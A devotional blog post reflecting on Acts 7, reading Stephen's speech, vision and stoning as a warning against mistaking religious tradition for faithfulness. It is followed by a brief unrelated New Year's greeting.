Stephen also dismantles the idea that God’s presence is confined to sacred spaces. He reminds them that God appeared to Moses in the wilderness, in Midian, in a burning bush far from Jerusalem. The holy ground was not defined by architecture but by God’s presence. This is a direct challenge to temple-centered faith. Not because the temple is evil, but because it has been elevated beyond its purpose.
By the time Stephen reaches the golden calf, the air is thick. He points out that while Moses was receiving living words from God, the people were crafting an idol. They wanted something visible, manageable, controllable. This is not ancient history. It is a diagnosis. People prefer gods they can predict over a God who speaks and disrupts.
Stephen’s speech is relentless in its honesty, but it is also deeply rooted in Scripture. He is not rejecting the story of Israel. He is insisting that the story be told fully. He refuses to let selective memory become a substitute for faithfulness. This is why Acts 7 still matters so much. It exposes the danger of knowing the Bible well enough to quote it but not well enough to let it confront us.
The turning point of the speech comes near the end, when Stephen finally names the pattern explicitly. He says what the stories have been implying all along. “You stiff-necked people,” he says, “uncircumcised in heart and ears, you always resist the Holy Spirit.” This is the moment when the room explodes internally. Up until now, Stephen has been narrating history. Now he is interpreting it. And in doing so, he collapses the distance between past and present.
Stephen does not accuse them of being worse than their ancestors. He accuses them of being the same. That is far more threatening. If they were worse, they could dismiss him as exaggerated. If they were different, they could reassure themselves that they had learned. But if they are the same, then everything is at risk.
He goes even further. He accuses them of betraying and murdering the Righteous One. The implication is unmistakable. The pattern has continued. The prophets were persecuted. The deliverers were rejected. And now, the Messiah has been killed by those who believed they were defending God.
This is not blasphemy. It is prophecy. It is also why Stephen cannot survive this speech. The Sanhedrin does not need more evidence. They are not interested in dialogue. They are enraged because Stephen has stripped away their moral insulation. He has exposed the possibility that religious certainty can coexist with resistance to God.
Stephen’s vision of Jesus standing at the right hand of God is not a triumphant escape. It is a confirmation. He sees Jesus not seated, but standing. As if to welcome him. As if to bear witness to his faithfulness. As if to affirm that telling the truth, even when it costs everything, is not wasted.
What follows is brutal. Stephen is dragged outside the city and stoned. But even in his death, his words continue. He echoes Jesus, praying for forgiveness for those who are killing him. This is not weakness. It is alignment. Stephen dies as he lived, fully conformed to the pattern of Christ.
Acts 7 forces uncomfortable questions. Not about history, but about us. Do we love God’s story, or do we love our version of it? Are we open to the possibility that God may move beyond the structures we have built to honor Him? Do we recognize the danger of confusing tradition with obedience?
Stephen’s speech is not preserved in Scripture because it is eloquent, though it is. It is preserved because it reveals something essential about faith. Faith is not proven by how fiercely we defend what we have inherited. Faith is revealed by how willing we are to follow God when He moves in ways that unsettle us.
Acts 7 reminds us that it is possible to know Scripture and still resist the Spirit. It is possible to defend God and still oppose His work. It is possible to honor the past while missing the present. Stephen did not die because he hated Israel. He died because he loved God’s truth more than his own safety.
This chapter refuses to let us remain comfortable readers. It asks whether we are listening to God or merely protecting our assumptions. It challenges us to examine whether our faith is alive and responsive, or carefully preserved and untouchable.
In the next part, we will look more closely at why Stephen’s retelling of history was so threatening, how Acts 7 reshapes the way we understand religious authority, and what this chapter demands from anyone who claims to follow Jesus today.
Stephen’s speech becomes even more unsettling the longer you sit with it, because Acts 7 is not merely an indictment of ancient leaders. It is a mirror held up to every generation that believes it has finally arrived at religious maturity. What makes this chapter endure is not that it exposes corruption in someone else, long ago, but that it quietly asks whether we would have stood with Stephen or stood with the stones.
One of the most overlooked aspects of Acts 7 is that Stephen never once argues for novelty. He is not presenting a new religion. He is not discarding Moses. He is not rejecting the law. He is insisting that God has always been bigger than the containers built to hold Him. That distinction matters, because religious resistance rarely announces itself as rebellion. It almost always disguises itself as faithfulness.
Stephen shows that the people he is addressing did not wake up one day intending to oppose God. They believed they were guarding something sacred. That is the danger. The greatest threat to living faith is not open hostility. It is settled certainty. It is the belief that God has already spoken fully and finally in ways that require no further listening.
This is why Stephen spends so much time emphasizing movement. Abraham moves. Joseph is moved. Moses flees and returns. Israel wanders. God’s presence appears in unexpected places. Acts 7 is a story in motion. The Sanhedrin, by contrast, represents fixity. Authority rooted in location. Power anchored to place. Truth tied to structure. Stephen’s crime is not doctrinal error. It is reminding them that God does not stay where He is put.
The temple looms large in this conflict. For the leaders, the temple is the ultimate symbol of God’s nearness. For Stephen, the temple has become a test case. Not because it is false, but because it has been absolutized. When something meant to point to God becomes the thing we defend most fiercely, it has quietly taken God’s place.
Stephen quotes the prophets to make this point unmistakable. “Heaven is my throne, and the earth is my footstool,” God says. “What kind of house will you build for me?” This is not anti-worship. It is anti-control. God is reminding His people that He cannot be contained, domesticated, or owned. Any attempt to do so, no matter how sincere, risks becoming idolatry.
This is where Acts 7 cuts deeply into modern faith as well. It challenges the assumption that longevity equals correctness. It confronts the idea that tradition automatically confers authority. Stephen does not deny the value of what came before. He denies the right of any generation to freeze God’s movement in time.
Stephen’s accusation that they “resist the Holy Spirit” is one of the most sobering phrases in the New Testament. Resistance to the Spirit is not framed here as moral failure. It is framed as spiritual rigidity. The inability to recognize God’s voice when it speaks differently than expected. The refusal to follow when obedience threatens identity.
What makes this resistance so tragic is that it is consistent. Stephen points out that their ancestors persecuted the prophets. Now they have murdered the Righteous One. The problem is not ignorance. It is pattern. And patterns, once exposed, are difficult to deny.
This is why the reaction is so violent. Truth that indicts behavior can be debated. Truth that exposes identity is unbearable. Stephen does not simply accuse them of doing something wrong. He tells them who they are becoming. He tells them they have aligned themselves with the very forces they believe they oppose.
Acts 7 also forces us to rethink courage. Stephen’s boldness is not reckless. It is rooted. He speaks as someone who knows the story so well that he cannot lie about it to save himself. His courage flows from coherence. His faith is not compartmentalized. It is integrated. What he believes, he lives. What he teaches, he embodies.
Stephen’s vision of Jesus standing at God’s right hand is not incidental. In Jewish imagery, a seated figure signifies completed work. A standing figure signifies advocacy or readiness. Stephen sees Jesus as one who stands to receive him, to testify on his behalf, to affirm that his life and death are not meaningless. This vision reframes martyrdom. Stephen is not abandoned. He is accompanied.
The presence of Saul at Stephen’s execution is another detail loaded with significance. Saul is introduced not as a villain, but as a witness. He watches. He approves. And later, he will become Paul. Acts 7 is not only about judgment. It is about seed. Stephen’s faithfulness plants something that will later explode into the Gentile mission. God is already at work beyond the moment of violence.
This reminds us that obedience does not always look successful in the moment. Stephen does not see the fruit of his witness. He does not get to watch Saul’s conversion. He does not get to participate in the church’s expansion. Faithfulness is not rewarded with immediate validation. Sometimes it is simply received by God and planted in ways we will never see.
Acts 7 challenges the metrics by which we measure impact. Stephen’s ministry appears short, interrupted, cut off. Yet his words echo through the rest of Acts. His theology shapes the church’s understanding of mission. His death accelerates the scattering of believers, which spreads the gospel further. What looks like defeat becomes multiplication.
This chapter also forces a painful self-examination. Would we recognize God if He spoke outside our preferred frameworks? Would we follow truth if it threatened our belonging? Would we listen to a voice like Stephen’s, or would we label it dangerous, divisive, or unfaithful?
Acts 7 does not allow us to remain neutral. It demands that we decide whether faith is primarily about preserving what we have received or responding to what God is doing now. It exposes the cost of telling the truth in systems that reward compliance over courage.
Stephen’s final prayer is perhaps the most haunting element of the chapter. He does not curse his killers. He does not demand justice. He entrusts himself to God and asks forgiveness for those who are killing him. This is not spiritual performance. It is the fruit of a life shaped by Jesus. In that moment, Stephen becomes a living echo of the cross.
Acts 7 leaves us with no neat conclusions. It ends with blood on the ground and witnesses walking away. And yet, it also leaves us with hope. God is not finished. The story is still moving. The Spirit is not contained.
This chapter reminds us that faithfulness may cost more than we want to pay, but it also assures us that obedience is never wasted. Stephen’s voice was silenced, but his truth was not. It continues to speak, unsettling comfortable faith and calling believers back to a living, listening, courageous trust in God.
Acts 7 stands as a warning and an invitation. A warning against mistaking tradition for truth. An invitation to follow God wherever He leads, even when the path is dangerous, misunderstood, or costly. It calls us to be people who know the story well enough to tell it honestly, even when honesty is the very thing that threatens us.
Stephen did not shatter the room because he was loud. He shattered it because he was faithful. And that kind of faith still disrupts everything it touches.
Your friend, Douglas Vandergraph
Watch Douglas Vandergraph’s inspiring faith-based videos on YouTube
Support the ministry by buying Douglas a coffee
#Acts7 #Stephen #BibleStudy #FaithAndCourage #ChristianWriting #NewTestament #Martyrdom #HolySpirit #TruthOverComfort
2025 is leaving for good and I look forward to 2026. Let’s spend the last day with family and friends, be optimistic, and handle all our problems the best we can. Finally, let’s all continue writing. Happy New Year, everyone!
#happynewyear #goodbye2025 #hello2026